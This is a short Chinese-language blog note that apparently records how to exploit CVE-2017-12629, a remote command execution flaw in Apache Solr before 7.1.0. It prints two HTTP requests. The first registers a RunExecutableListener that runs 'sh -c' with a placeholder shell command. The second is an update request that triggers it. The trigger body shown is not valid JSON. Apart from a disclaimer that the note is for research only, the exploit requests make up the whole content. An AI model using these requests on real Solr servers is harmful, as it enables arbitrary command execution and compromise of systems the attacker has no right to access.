57uv6Z6g55qE5Y2a5a6i

MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究，请勿非法破坏，请遵守相关法律法规，后果自负

【笔记】CVE-2017-12629漏洞利用

发表于 2024-06-26 更新于 2025-12-12 阅读次数：

前言

Java的Solr框架远程命令执行漏洞利用
Solr默认端口号为8983

漏洞利用前提

Apache Solr < 7.1.0

exp

request

POST http://127.0.0.1:80/solr/admin/config
Content-Type: application/json

{"add-listener":{"event":"postCommit","name":"x","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","<shell>"]}

触发

request

POST http://127.0.0.1:80/solr/admin/update
Content-Type: application/json

[{"x","x"}]

完成

0%